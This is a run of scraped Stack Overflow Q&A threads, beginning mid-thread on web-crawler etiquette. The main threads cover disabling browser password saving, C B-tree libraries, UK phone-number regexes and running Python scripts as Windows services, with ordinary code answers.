your crawler is not too aggressive. A: It's perfectly accetable to do - just make sure it only visits each page once for each session. As you're technically creating a searchbot you must obey robots.txt and no-cache rules. People can still block your bot specifically if needed by blocking IPs. You're only looking for source code as far as I can tell so you'll want to build something to follow <link>s for stylesheets and <script src="..."></script> for JavaScripts. A: Load is a big consideration. Put limits on how often you crawl a particular site and what is the most basic info you need to accomplish your goal. If you are looking for text do not download all images, stuff like that. Of course obey robots.txt but also make sure your user agent string includes accurate contact info and maybe a link to a web page describing what you are doing and how you do it. If a web admin is seeing a lot of requests from you and is curious you might be able to answer a lot of questions with an informative web page. A: You will need to add some capability to blacklist sites / domains or other things (IP ranges, ASN, etc) to avoid your spider getting bogged down with spam sites. You'll need to have a HTTP implementation with a lot of control over timeout and behaviour. Expect a lot of sites to send back invalid responses, huge responses, rubbish headers, or just leave the connection open indefinitely with no response etc. Also don't trust a 200 status to mean "the page exists". Quite a large proportion of sites send back 200 for "Not found" or other errors, in my experience (Along with a large HTML document).
{ "language": "en", "url": "https://stackoverflow.com/questions/32366", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "11" }
Q: Disable browser 'Save Password' functionality One of the joys of working for a government healthcare agency is having to deal with all of the paranoia around dealing with PHI (Protected Health Information). Don't get me wrong, I'm all for doing everything possible to protect people's personal information (health, financial, surfing habits, etc.), but sometimes people get a little too jumpy. Case in point: One of our state customers recently found out that the browser provides the handy feature to save your password. We all know that it has been there for a while and is completely optional and is up to the end user to decide whether or not it is a smart decision to use or not. However, there is a bit of an uproar at the moment and we are being demanded to find a way to disable that functionality for our site. Question: Is there a way for a site to tell the browser not to offer to remember passwords? I've been around web development a long time but don't know that I have come across that before. Any help is appreciated. A: Not really - the only thing you could realistically do is offer advice on the site; maybe, before their first time signing in, you could show them a form with information indicating that it is not recommended that they allow the browser to store the password. Then the user will immediately follow the advice, write down the password on a post-it note and tape it to their monitor. A: In addition to autocomplete="off" Use readonly onfocus="this.removeAttribute('readonly');" for the inputs that you do not want them to remember form data (username, password, etc.) as shown below: <input type="text" name="UserName" autocomplete="off" readonly onfocus="this.removeAttribute('readonly');" > <input type="password" name="Password" autocomplete="off" readonly onfocus="this.removeAttribute('readonly');" > Tested on the latest versions of the major browsers i.e. Google Chrome, Mozilla Firefox, Microsoft Edge, etc. and works like a charm. A: What I have been doing is a combination of autocomplete="off" and clearing password fields using a javascript / jQuery. jQuery Example: $(function() { $('#PasswordEdit').attr("autocomplete", "off"); setTimeout('$("#PasswordEdit").val("");', 50); }); By using setTimeout() you can wait for the browser to complete the field before you clear it, otherwise the browser will always autocomplete after you've clear the field. A: I had been struggling with this problem a while, with a unique twist to the problem. Privileged users couldn't have the saved passwords work for them, but normal users needed it. This meant privileged users had to log in twice, the second time enforcing no saved passwords. With this requirement, the standard autocomplete="off" method doesn't work across all browsers, because the password may have been saved from the first login. A colleague found a solution to replace the password field when it was focused with a new password field, and then focus on the new password field (then hook up the same event handler). This worked (except it caused an infinite loop in IE6). Maybe there was a way around that, but it was causing me a migraine. Finally, I tried to just have the username and password outside of the form. To my surprise, this worked! It worked on IE6, and current versions of Firefox and Chrome on Linux. I haven't tested it further, but I suspect it works in most if not all browsers (but it wouldn't surprise me if there was a browser out there that didn't care if there was no form). Here is some sample code, along with some jQuery to get it to work: <input type="text" id="username" name="username"/> <input type="password" id="password" name="password"/> <form id="theForm" action="/your/login" method="post"> <input type="hidden" id="hiddenUsername" name="username"/> <input type="hidden" id="hiddenPassword" name="password"/> <input type="submit" value="Login"/> </form> <script type="text/javascript" language="JavaScript"> $("#theForm").submit(function() { $("#hiddenUsername").val($("#username").val()); $("#hiddenPassword").val($("#password").val()); }); $("#username,#password").keypress(function(e) { if (e.which == 13) { $("#theForm").submit(); } }); </script> A: I'm not sure if it'll work in all browsers but you should try setting autocomplete="off" on the form. <form id="loginForm" action="login.cgi" method="post" autocomplete="off"> The easiest and simplest way to disable Form and Password storage prompts and prevent form data from being cached in session history is to use the autocomplete form element attribute with value "off". From https://developer.mozilla.org/en-US/docs/Web/Security/Securing_your_site/Turning_off_form_autocompletion Some minor research shows that this works in IE to but I'll leave no guarantees ;) @Joseph: If it's a strict requirement to pass XHTML validation with the actual markup (don't know why it would be though) you could theoretically add this attribute with javascript afterwards but then users with js disabled (probably a neglectable amount of your userbase or zero if your site requires js) will still have their passwords saved. Example with jQuery: $('#loginForm').attr('autocomplete', 'off'); A: Well, its a very old post, but still I will give my solution, which my team had been trying to achieve for long. We just added a new input type="password" field inside the form and wrapped it in div and made the div hidden. Made sure that this div is before the actual password input. This worked for us and it didn't gave any Save Password option Plunk - http://plnkr.co/edit/xmBR31NQMUgUhYHBiZSg?p=preview HTML: <form method="post" action="yoururl"> <div class="hidden"> <input type="password"/> </div> <input type="text" name="username" placeholder="username"/> <input type="password" name="password" placeholder="password"/> </form> CSS: .hidden {display:none;} A: if autocomplete="off" is not working...remove the form tag and use a div tag instead, then pass the form values using jquery to the server. This worked for me. A: Because autocomplete="off" does not work for password fields, one must rely on javascript. Here's a simple solution based on answers found here. Add the attribute data-password-autocomplete="off" to your password field: <input type="password" data-password-autocomplete="off"> Include the following JS: $(function(){ $('[data-password-autocomplete="off"]').each(function() { $(this).prop('type', 'text'); $('<input type="password"/>').hide().insertBefore(this); $(this).focus(function() { $(this).prop('type', 'password'); }); }); }); This solution works for both Chrome and FF. A: This is my html code for solution. It works for Chrome-Safari-Internet Explorer. I created new font which all characters seem as "●". Then I use this font for my password text. Note: My font name is "passwordsecretregular". <style type="text/css"> #login_parola { font-family: 'passwordsecretregular' !important; -webkit-text-security: disc !important; font-size: 22px !important; } </style> <input type="text" class="w205 has-keyboard-alpha" name="login_parola" id="login_parola" onkeyup="checkCapsWarning(event)" onfocus="checkCapsWarning(event)" onblur="removeCapsWarning()" onpaste="return false;" maxlength="32"/> A: Just so people realise - the 'autocomplete' attribute works most of the time, but power users can get around it using a bookmarklet. Having a browser save your passwords actually increases protection against keylogging, so possibly the safest option is to save passwords in the browser but protect them with a master password (at least in Firefox). A: I have a work around, which may help. You could make a custom font hack. So, make a custom font, with all the characters as a dot / circle / star for example. Use this as a custom font for your website. Check how to do this in inkscape: how to make your own font Then on your log in form use: <form autocomplete='off' ...> <input type="text" name="email" ...> <input type="text" name="password" class="password" autocomplete='off' ...> <input type=submit> </form> Then add your css: @font-face { font-family: 'myCustomfont'; src: url('myCustomfont.eot'); src: url('myCustomfont?#iefix') format('embedded-opentype'), url('myCustomfont.woff') format('woff'), url('myCustomfont.ttf') format('truetype'), url('myCustomfont.svg#myCustomfont') format('svg'); font-weight: normal; font-style: normal; } .password { font-family:'myCustomfont'; } Pretty cross browser compatible. I have tried IE6+, FF, Safari and Chrome. Just make sure that the oet font that you convert does not get corrupted. Hope it helps? A: The simplest way to solve this problem is to place INPUT fields outside the FORM tag and add two hidden fields inside the FORM tag. Then in a submit event listener before the form data gets submitted to server copy values from visible input to the invisible ones. Here's an example (you can't run it here, since the form action is not set to a real login script): <!doctype html> <html> <head> <title>Login & Save password test</title> <meta charset="utf-8"> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js"></script> </head> <body> <!-- the following fields will show on page, but are not part of the form --> <input class="username" type="text" placeholder="Username" /> <input class="password" type="password" placeholder="Password" /> <form id="loginForm" action="login.aspx" method="post"> <!-- thw following two fields are part of the form, but are not visible --> <input name="username" id="username" type="hidden" /> <input name="password" id="password" type="hidden" /> <!-- standard submit button --> <button type="submit">Login</button> </form> <script> // attache a event listener which will get called just before the form data is sent to server $('form').submit(function(ev) { console.log('xxx'); // read the value from the visible INPUT and save it to invisible one // ... so that it gets sent to the server $('#username').val($('.username').val()); $('#password').val($('.password').val()); }); </script> </body> </html> A: My js (jquery) workaround is to change password input type to text on form submit. The password could become visible for a second, so I also hide the input just before that. I would rather not use this for login forms, but it is useful (together with autocomplete="off") for example inside administration part of the website. Try putting this inside a console (with jquery), before you submit the form. $('form').submit(function(event) { $(this).find('input[type=password]').css('visibility', 'hidden').attr('type', 'text'); }); Tested on Chrome 44.0.2403.157 (64-bit). A: I tested lots of solutions. Dynamic password field name, multiple password fields (invisible for fake ones), changing input type from "text" to "password", autocomplete="off", autocomplete="new-password",... but nothing solved it with recent browser. To get rid of password remember, I finally treated the password as input field, and "blur" the text typed. It is less "safe" than a native password field since selecting the typed text would show it as clear text, but password is not remembered. It also depends on having Javascript activated. You will have estimate the risk of using below proposal vs password remember option from navigator. While password remember can be managed (disbaled per site) by the user, it's fine for a personal computer, not for a "public" or shared computer. I my case it's for a ERP running on shared computers, so I'll give it a try to my solution below. <input style="background-color: rgb(239, 179, 196); color: black; text-shadow: none;" name="password" size="10" maxlength="30" onfocus="this.value='';this.style.color='black'; this.style.textShadow='none';" onkeypress="this.style.color='transparent'; this.style.textShadow='1px 1px 6px green';" autocomplete="off" type="text"> A: You can prevent the browser from matching the forms up by randomizing the name used for the password field on each show. Then the browser sees a password for the same the url, but can't be sure it's the same password. Maybe it's controlling something else. Update: note that this should be in addition to using autocomplete or other tactics, not a replacement for them, for the reasons indicated by others. Also note that this will only prevent the browser from auto-completing the password. It won't prevent it from storing the password in whatever level of arbitrary security the browser chooses to use. A: The cleanest way is to use autocomplete="off" tag attribute but Firefox does not properly obey it when you switch fields with Tab. The only way you could stop this is to add a fake hidden password field which tricks the browser to populate the password there. <input type="text" id="username" name="username"/> <input type="password" id="prevent_autofill" autocomplete="off" style="display:none" tabindex="-1" /> <input type="password" id="password" autocomplete="off" name="password"/> It is an ugly hack, because you change the browser behavior, which should be considered bad practice. Use it only if you really need it. Note: this will effectively stop password autofill, because FF will "save" the value of #prevent_autofill (which is empty) and will try to populate any saved passwords there, as it always uses the first type="password" input it finds in DOM after the respective "username" input. A: Use real two-factor authentication to avoid the sole dependency on passwords which might be stored in many more places than the user's browser cache. A: I have tested that adding autocomplete="off" in form tag in all major browsers. In fact, Most of the peoples in US using IE8 so far. * *IE8, IE9, IE10, Firefox, Safari are works fine. Browser not asking "save password". Also, previously saved username & password not populated. *Chrome & IE 11 not supporting the autocomplete="off" feature *FF supporting the autocomplete="off". but sometimes existing saved credentials are populated. Updated on June 11, 2014 Finally, below is a cross browser solution using javascript and it is working fine in all browsers. Need to remove "form" tag in login form. After client side validation, put that credentials in hidden form and submit it. Also, add two methods. one for validation "validateLogin()" and another for listening enter event while click enter in textbox/password/button "checkAndSubmit()". because now login form does not have a form tag, so enter event not working here. HTML <form id="HiddenLoginForm" action="" method="post"> <input type="hidden" name="username" id="hidden_username" /> <input type="hidden" name="password" id="hidden_password" /> </form> Username: <input type="text" name="username" id="username" onKeyPress="return checkAndSubmit(event);" /> Password: <input type="text" name="password" id="password" onKeyPress="return checkAndSubmit(event);" /> <input type="button" value="submit" onClick="return validateAndLogin();" onKeyPress="return checkAndSubmit(event);" /> Javascript //For validation- you can modify as you like function validateAndLogin(){ var username = document.getElementById("username"); var password = document.getElementById("password"); if(username && username.value == ''){ alert("Please enter username!"); return false; } if(password && password.value == ''){ alert("Please enter password!"); return false; } document.getElementById("hidden_username").value = username.value; document.getElementById("hidden_password").value = password.value; document.getElementById("HiddenLoginForm").submit(); } //For enter event function checkAndSubmit(e) { if (e.keyCode == 13) { validateAndLogin(); } } Good luck!!! A: Markus raised a great point. I decided to look up the autocomplete attribute and got the following: The only downside to using this attribute is that it is not standard (it works in IE and Mozilla browsers), and would cause XHTML validation to fail. I think this is a case where it's reasonable to break validation however. (source) So I would have to say that although it doesn't work 100% across the board it is handled in the major browsers so its a great solution. A: The real problem is much deeper than just adding attributes to your HTML - this is common security concern, that's why people invented hardware keys and other crazy things for security. Imagine you have autocomplete="off" perfectly working in all browsers. Would that help with security? Of course, no. Users will write down their passwords in textbooks, on stickers attached to their monitor where every office visitor can see them, save them to text files on the desktop and so on. Generally, web application and web developer isn't responsible in any way for end-user security. End-users can protect themselves only. Ideally, they MUST keep all passwords in their head and use password reset functionality (or contact administrator) in case they forgot it. Otherwise there always will be a risk that password can be seen and stolen somehow. So either you have some crazy security policy with hardware keys (like, some banks offer for Internet-banking which basically employs two-factor authentication) or NO SECURITY basically. Well, this is a bit over exaggerated of course. It's important to understand what are you trying to protect against: * *Not authorised access. Simplest login form is enough basically. There sometimes additional measures taken like random security questions, CAPTCHAs, password hardening etc. *Credential sniffing. HTTPS is A MUST if people access your web application from public Wi-Fi hotspots etc. Mention that even having HTTPS, your users need to change their passwords regularly. *Insider attack. There are two many examples of such, starting from simple stealing of your passwords from browser or those that you have written down somewhere on the desk (does not require any IT skills) and ending with session forging and intercepting local network traffic (even encrypted) and further accessing web application just like it was another end-user. In this particular post, I can see inadequate requirements put on developer which he will never be able to resolve due to the nature of the problem - end-user security. My subjective point is that developer should basically say NO and point on requirement problem rather than wasting time on such tasks, honestly. This does not absolutely make your system more secure, it will rather lead to the cases with stickers on monitors. Unfortunately, some bosses hear only what they want to hear. However, if I was you I would try to explain where the actual problem is coming from, and that autocomplete="off" would not resolve it unless it will force users to keep all their passwords exclusively in their head! Developer on his end cannot protect users completely, users need to know how to use system and at the same time do not expose their sensitive/secure information and this goes far beyond authentication. A: I tried above autocomplete="off" and yet anything successful. if you are using angular js my recommendation is to go with button and the ng-click. <button type="button" class="" ng-click="vm.login()" /> This already have a accepted answer im adding this if someone cant solve the problem with the accepted answer he can go with my mechanism. Thanks for the question and the answers. A: One way I know is to use (for instance) JavaScript to copy the value out of the password field before submitting the form. The main problem with this is that the solution is tied to JavaScript. Then again, if it can be tied to JavaScript you might as well hash the password on the client-side before sending a request to the server. A: Facing the same HIPAA issue and found a relatively easy solution, * *Create a hidden password field with the field name as an array. <input type="password" name="password[]" style="display:none" /> *Use the same array for the actual password field. <input type="password" name="password[]" /> The browser (Chrome) may prompt you to "Save password" but regardless if the user selects save, the next time they login the password will auto-populate the hidden password field, the zero slot in the array, leaving the 1st slot blank. I tried defining the array, such as "password[part2]" but it still remembered. I think it throws it off if it's an unindexed array because it has no choice but to drop it in the first spot. Then you use your programming language of choice to access the array, PHP for example, echo $_POST['password'][1]; A: Since most of the autocomplete suggestions, including the accepted answer, don't work in today's web browsers (i.e. web browser password managers ignore autocomplete), a more novel solution is to swap between password and text types and make the background color match the text color when the field is a plain text field, which continues to hide the password while being a real password field when the user (or a program like KeePass) is entering a password. Browsers don't ask to save passwords that are stored in plain text fields. The advantage of this approach is that it allows for progressive enhancement and therefore doesn't require Javascript for a field to function as a normal password field (you could also start with a plain text field instead and apply the same approach but that's not really HIPAA PHI/PII-compliant). Nor does this approach depend on hidden forms/fields which might not necessarily be sent to the server (because they are hidden) and some of those tricks also don't work either in several modern browsers. jQuery plugin: https://github.com/cubiclesoft/php-flexforms-modules/blob/master/password-manager/jquery.stoppasswordmanager.js Relevant source code from the above link: (function($) { $.fn.StopPasswordManager = function() { return this.each(function() { var $this = $(this); $this.addClass('no-print'); $this.attr('data-background-color', $this.css('background-color')); $this.css('background-color', $this.css('color')); $this.attr('type', 'text'); $this.attr('autocomplete', 'off'); $this.focus(function() { $this.attr('type', 'password'); $this.css('background-color', $this.attr('data-background-color')); }); $this.blur(function() { $this.css('background-color', $this.css('color')); $this.attr('type', 'text'); $this[0].selectionStart = $this[0].selectionEnd; }); $this.on('keydown', function(e) { if (e.keyCode == 13) { $this.css('background-color', $this.css('color')); $this.attr('type', 'text'); $this[0].selectionStart = $this[0].selectionEnd; } }); }); } }(jQuery)); Demo: https://barebonescms.com/demos/admin_pack/admin.php Click "Add Entry" in the menu and then scroll to the bottom of the page to "Module: Stop Password Manager". Disclaimer: While this approach works for sighted individuals, there might be issues with screen reader software. For example, a screen reader might read the user's password out loud because it sees a plain text field. There might also be other unforeseen consequences of using the above plugin. Altering built-in web browser functionality should be done sparingly with testing a wide variety of conditions and edge cases. A: <input type="text" id="mPassword" required="required" title="Valid password required" autocomplete="off" list="autocompleteOff" readonly onfocus="this.removeAttribute('readonly');" style="text-security:disc; -webkit-text-security:disc;" oncopy="return false;" onpaste="return false;"/> A: IMHO, The best way is to randomize the name of the input field that has type=password. Use a prefix of "pwd" and then a random number. Create the field dynamically and present the form to the user. Your log-in form will look like... <form> <input type=password id=pwd67584 ...> <input type=text id=username ...> <input type=submit> </form> Then, on the server side, when you analyze the form posted by the client, catch the field with a name that starts with "pwd" and use it as 'password'. A: i think by putting autocomplete="off" does not help at all i have alternative solution, <input type="text" name="preventAutoPass" id="preventAutoPass" style="display:none" /> add this before your password input. eg:<input type="text" name="txtUserName" id="txtUserName" /> <input type="text" name="preventAutoPass" id="preventAutoPass" style="display:none" /> <input type="password" name="txtPass" id="txtPass" autocomplete="off" /> this does not prevent browser ask and save the password. but it prevent the password to be filled in. cheer A: autocomplete="off" works for most modern browsers, but another method I used that worked successfully with Epiphany (a WebKit-powered browser for GNOME) is to store a randomly generated prefix in session state (or a hidden field, I happened to have a suitable variable in session state already), and use this to alter the name of the fields. Epiphany still wants to save the password, but when going back to the form it won't populate the fields. A: I haven't had any issues using this method: Use autocomplete="off", add a hidden password field and then another non-hidden one. The browser tries to auto complete the hidden one if it doesn't respect autocomplete="off" A: Another solution is to make the POST using an hidden form where all the input are of type hidden. The visible form will use input of type "password". The latter form will never be submitted and so the browser can't intercept at all the operation of login. A: Since Internet Explorer 11 no longer supports autocomplete="off" for input type="password" fields (hopefully no other browsers will follow their lead), the cleanest approach (at the time of writing) seems to be making users submit their username and password in different pages, i.e. the user enters their username, submit, then enters their password and submit. The Bank Of America and HSBC Bank websites are using this, too. Because the browser is unable to associate the password with a username, it will not offer to store passwords. This approach works in all major browsers (at the time of writing) and will function properly without the use of Javascript. The downsides are that it would be more troublesome for the user, and would take 2 postbacks for a login action instead of one, so it really depends on how secure your website needs to be. Update: As mentioned in this comment by Gregory, Firefox will be following IE11's lead and ignore autocomplete="off" for password fields. A: Is there a way for a site to tell the browser not to offer to remember passwords? The website tells the browser that it is a password by using <input type="password">. So if you must do this from a website perspective then you would have to change that. (Obviously I don't recommend this). The best solution would be to have the user configure their browser so it won't remember passwords. A: If you do not want to trust the autocomplete flag, you can make sure that the user types in the box using the onchange event. The code below is a simple HTML form. The hidden form element password_edited starts out set to 0. When the value of password is changed, the JavaScript at the top (pw_edited function) changes the value to 1. When the button is pressed, it checks the valueenter code here before submitting the form. That way, even if the browser ignores you and autocompletes the field, the user cannot pass the login page without typing in the password field. Also, make sure to blank the password field when focus is set. Otherwise, you can add a character at the end, then go back and remove it to trick the system. I recommend adding the autocomplete="off" to password in addition, but this example shows how the backup code works. <html> <head> <script> function pw_edited() { document.this_form.password_edited.value = 1; } function pw_blank() { document.this_form.password.value = ""; } function submitf() { if(document.this_form.password_edited.value < 1) { alert("Please Enter Your Password!"); } else { document.this_form.submit(); } } </script> </head> <body> <form name="this_form" method="post" action="../../cgi-bin/yourscript.cgi?login"> <div style="padding-left:25px;"> <p> <label>User:</label> <input name="user_name" type="text" class="input" value="" size="30" maxlength="60"> </p> <p> <label>Password:</label> <input name="password" type="password" class="input" size="20" value="" maxlength="50" onfocus="pw_blank();" onchange="pw_edited();"> </p> <p> <span id="error_msg"></span> </p> <p> <input type="hidden" name="password_edited" value="0"> <input name="submitform" type="button" class="button" value="Login" onclick="return submitf();"> </p> </div> </form> </body> </html> A: autocomplete="off" does not work for disabling the password manager in Firefox 31 and most likely not in some earlier versions, too. Checkout the discussion at mozilla about this issue: https://bugzilla.mozilla.org/show_bug.cgi?id=956906 We wanted to use a second password field to enter a one-time password generated by a token. Now we are using a text input instead of a password input. :-( A: I was given a similar task to disable the auto-filling up of login name and passwords by browser, after lot of trial and errors i found the below solution to be optimal. Just add the below controls before your original controls. <input type="text" style="display:none"> <input type="text" name="OriginalLoginTextBox"> <input type="password" style="display:none"> <input type="text" name="OriginalPasswordTextBox"> This is working fine for IE11 and Chrome 44.0.2403.107
{ "language": "en", "url": "https://stackoverflow.com/questions/32369", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "457" }
Q: What is a good open source B-tree implementation in C? I am looking for a lean and well constructed open source implementation of a B-tree library written in C. It needs to be under a non-GPL license so that it can be used in a commercial application. Ideally, this library supports the B-tree index to be stored/manipulated as a disk file so that large trees can be built using a configurable (ie: minimal) RAM footprint. Note: Since there seemed to be some confusion, a Binary Tree and a B-Tree are not the same thing. A: The author of the SQLite implementation has disclaimed copyright. If LGPL is okay, then maybe you could use GNUpdate's implementation? A: If LGPL is ok, then Tokyo Cabinet might fit the bill. LGPL allows linking with a non-Free application, without adding any constraints on the distribution of the final product. A: Check out QDBM: http://fallabs.com/qdbm/. It's LGPL (can be used in commercial app), implements a disk backed hash and/or B+ tree with arbitrary key/value pairs, and builds on a variety of platforms. A: Attractive Chaos implement kbtree.h. It's a efficient B-tree library A: I came across this - The WB B-Tree Database for SCM, Java, C#, and C that's a GNU package. A: Maybe you can considere the berkeley db. It is using a b-tree internally.
{ "language": "en", "url": "https://stackoverflow.com/questions/32376", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "34" }
Q: Programmatically editing Python source This is something that I think would be very useful. Basically, I'd like there to be a way to edit Python source programmatically without requiring human intervention. There are a couple of things I would like to do with this: * *Edit the configuration of Python apps that use source modules for configuration. *Set up a "template" so that I can customize a Python source file on the fly. This way, I can set up a "project" system on an open source app I'm working on and allow certain files to be customized. I could probably write something that can do this myself, but I can see that opening up a lot of "devil's in the details" type issues. Are there any ways to do this currently, or am I just going to have to bite the bullet and implement it myself? A: Python's standard library provides pretty good facilities for working with Python source; note the tokenize and parser modules. A: I had the same issue and I simply opened the file and did some replace: then reload the file in the Python interpreter. This works fine and is easy to do. Otherwise AFAIK you have to use some conf objects. A: Most of these kinds of things can be determined programatically in Python, using modules like sys, os, and the special _file_ identifier which tells you where you are in the filesystem path. It's important to keep in mind that when a module is first imported it will execute everything in the file-scope, which is important for developing system-dependent behaviors. For example, the os module basically determines what operating system you're using on import and then adjusts its implementation accordingly (by importing another module corresponding to Linux, OSX, Windows, etc.). There's a lot of power in this feature and something along these lines is probably what you're looking for. :) [Edit] I've also used socket.gethostname() in some rare, hackish instances. ;)
{ "language": "en", "url": "https://stackoverflow.com/questions/32385", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "10" }
Q: Accessing static fields in XAML How does one go about referencing a class's static properties in xaml? In other words, I want to do something like this: Class BaseThingy { public static readonly Style BaseStyle; ... } <ResoureDictionary ...> <Style BasedOn="BaseThingy.Style" TargetType="BaseThingy" /> </ResourceDictionary> What is the syntax to do this in the BasedOn? I assumed it would involve using StaticResource to some degree, but I haven't gotten it to work for me. A: Use x:Static markup extension <ResoureDictionary ... xmlns:local="clr-namespace:Namespace.Where.Your.BaseThingy.Class.Is.Defined" > <Style BasedOn="{x:Static local:BaseThingy.BaseStyle}" TargetType="BaseThingy" /> </ResourceDictionary>
{ "language": "en", "url": "https://stackoverflow.com/questions/32395", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "4" }
Q: Popularity algorithm On SO 18 Joel mentioned an algorithm that would rank items based on their age and popularity and it's based on gravity. Could someone post this? C# would be lovely, but really any language (well, I can't do LISP) would be fine. A: alt text http://www.mt-soft.com.ar/wordpress/wp-content/plugins/wp-o-matic/cache/0ad4d_reddit_cf_algorithm.png A: My understanding is that it is approximately the following from another Jeff Atwood post t = (time of entry post) - (Dec 8, 2005) x = upvotes - downvotes y = {1 if x > 0, 0 if x = 0, -1 if x < 0) z = {1 if x < 1, otherwise x} log(z) + (y * t)/45000
{ "language": "en", "url": "https://stackoverflow.com/questions/32397", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "14" }
Q: Validate a UK phone number How do I validate a UK phone number in C# using a regex? A: The regex in the accepted answer does not match all valid UK numbers, as it is too restricive (additional number ranges have been opened up in the meanwhile such as 0203, which it sees as invalid). UK phone numbers follow fairly simple rules: * *They can be either 10 or 11 digits long (with the exception of some special numbers, but you're unlikely to need to validate those) *They consist of an area code followed by a local number. The area code varies in length between three and five digits, and the local portion of the number takes up the remaining length of the 10 or 11 digits. For all practical purposes, no-one ever quotes just the local portion of their number, so you can ignore the distinction now, except for how it affects formatting. *They start with zero. *The second digit can be anything. Currently no valid numbers start with 04 or 06, but there's nothing stopping these ranges coming into use in the future. (03 has recently been brought into use) *They can be formatted with a set of brackets and with spaces (one or more, in varying positions), but those are all entirely optional. Therefore, a basic working expression for UK phone numbers could look like this: /^\(?0( *\d\)?){9,10}$/ This will check for 10 or 11 digit numbers, starting with a zero, with formatting spaces between any of the digits, and optionally a set of brackets for the area code. (and yes, this would allow mis-matched brackets, as I'm not checking that there's only one closing bracket. Enforcing this would make the expression a lot more complex, and I don't have time for this right now, but feel free to add this if you wish) By the way, in case you want to do additional filtering, you might want to also note the following rules: * *Numbers starting 08, 09 and 070 are special price numbers, and would not generally be given as private numbers, so can be excluded if validating a private number. *07 numbers are mobile (except 070; see above) so can be excluded if you're specifically validating for a landline.
{ "language": "en", "url": "https://stackoverflow.com/questions/32401", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "6" }
Q: How do you run a Python script as a service in Windows? I am sketching the architecture for a set of programs that share various interrelated objects stored in a database. I want one of the programs to act as a service which provides a higher level interface for operations on these objects, and the other programs to access the objects through that service. I am currently aiming for Python and the Django framework as the technologies to implement that service with. I'm pretty sure I figure how to daemonize the Python program in Linux. However, it is an optional spec item that the system should support Windows. I have little experience with Windows programming and no experience at all with Windows services. Is it possible to run a Python programs as a Windows service (i. e. run it automatically without user login)? I won't necessarily have to implement this part, but I need a rough idea how it would be done in order to decide whether to design along these lines. Edit: Thanks for all the answers so far, they are quite comprehensive. I would like to know one more thing: How is Windows aware of my service? Can I manage it with the native Windows utilities? What is the equivalent of putting a start/stop script in /etc/init.d? A: The simplest way is to use the: NSSM - the Non-Sucking Service Manager. Just download and unzip to a location of your choosing. It's a self-contained utility, around 300KB (much less than installing the entire pywin32 suite just for this purpose) and no "installation" is needed. The zip contains a 64-bit and a 32-bit version of the utility. Either should work well on current systems (you can use the 32-bit version to manage services on 64-bit systems). GUI approach 1 - install the python program as a service. Open a Win prompt as admin c:\>nssm.exe install WinService 2 - On NSSM´s GUI console: path: C:\Python27\Python27.exe Startup directory: C:\Python27 Arguments: c:\WinService.py 3 - check the created services on services.msc Scripting approach (no GUI) This is handy if your service should be part of an automated, non-interactive procedure, that may be beyond your control, such as a batch or installer script. It is assumed that the commands are executed with administrative privileges. For convenience the commands are described here by simply referring to the utility as nssm.exe. It is advisable, however, to refer to it more explicitly in scripting with its full path c:\path\to\nssm.exe, since it's a self-contained executable that may be located in a private path that the system is not aware of. 1. Install the service You must specify a name for the service, the path to the proper Python executable, and the path to the script: nssm.exe install ProjectService "c:\path\to\python.exe" "c:\path\to\project\app\main.py" More explicitly: nssm.exe install ProjectService nssm.exe set ProjectService Application "c:\path\to\python.exe" nssm.exe set ProjectService AppParameters "c:\path\to\project\app\main.py" Alternatively you may want your Python app to be started as a Python module. One easy approach is to tell nssm that it needs to change to the proper starting directory, as you would do yourself when launching from a command shell: nssm.exe install ProjectService "c:\path\to\python.exe" "-m app.main" nssm.exe set ProjectService AppDirectory "c:\path\to\project" This approach works well with virtual environments and self-contained (embedded) Python installs. Just make sure to have properly resolved any path issues in those environments with the usual methods. nssm has a way to set environment variables (e.g. PYTHONPATH) if needed, and can also launch batch scripts. 2. To start the service nssm.exe start ProjectService 3. To stop the service nssm.exe stop ProjectService 4. To remove the service, specify the confirm parameter to skip the interactive confirmation. nssm.exe remove ProjectService confirm A: pysc: Service Control Manager on Python Example script to run as a service taken from pythonhosted.org: from xmlrpc.server import SimpleXMLRPCServer from pysc import event_stop class TestServer: def echo(self, msg): return msg if __name__ == '__main__': server = SimpleXMLRPCServer(('127.0.0.1', 9001)) @event_stop def stop(): server.server_close() server.register_instance(TestServer()) server.serve_forever() Create and start service import os import sys from xmlrpc.client import ServerProxy import pysc if __name__ == '__main__': service_name = 'test_xmlrpc_server' script_path = os.path.join( os.path.dirname(__file__), 'xmlrpc_server.py' ) pysc.create( service_name=service_name, cmd=[sys.executable, script_path] ) pysc.start(service_name) client = ServerProxy('http://127.0.0.1:9001') print(client.echo('test scm')) Stop and delete service import pysc service_name = 'test_xmlrpc_server' pysc.stop(service_name) pysc.delete(service_name) pip install pysc A: nssm in python 3+ (I converted my .py file to .exe with pyinstaller) nssm: as said before * *run nssm install {ServiceName} *On NSSM´s console: path: path\to\your\program.exe Startup directory: path\to\your\ #same as the path but without your program.exe Arguments: empty If you don't want to convert your project to .exe * *create a .bat file with python {{your python.py file name}} *and set the path to the .bat file A: Although I upvoted the chosen answer a couple of weeks back, in the meantime I struggled a lot more with this topic. It feels like having a special Python installation and using special modules to run a script as a service is simply the wrong way. What about portability and such? I stumbled across the wonderful Non-sucking Service Manager, which made it really simple and sane to deal with Windows Services. I figured since I could pass options to an installed service, I could just as well select my Python executable and pass my script as an option. I have not yet tried this solution, but I will do so right now and update this post along the process. I am also interested in using virtualenvs on Windows, so I might come up with a tutorial sooner or later and link to it here. A: I started hosting as a service with pywin32. Everything was well but I met the problem that service was not able to start within 30 seconds (default timeout for Windows) on system startup. It was critical for me because Windows startup took place simultaneous on several virtual machines hosted on one physical machine, and IO load was huge. Error messages were: Error 1053: The service did not respond to the start or control request in a timely fashion. Error 7009: Timeout (30000 milliseconds) waiting for the <ServiceName> service to connect. I fought a lot with pywin, but ended up with using NSSM as it was proposed in this answer. It was very easy to migrate to it. A: The simplest way to achieve this is to use native command sc.exe: sc create PythonApp binPath= "C:\Python34\Python.exe --C:\tmp\pythonscript.py" References: * *https://technet.microsoft.com/en-us/library/cc990289(v=ws.11).aspx *When creating a service with sc.exe how to pass in context parameters? A: Yes you can. I do it using the pythoncom libraries that come 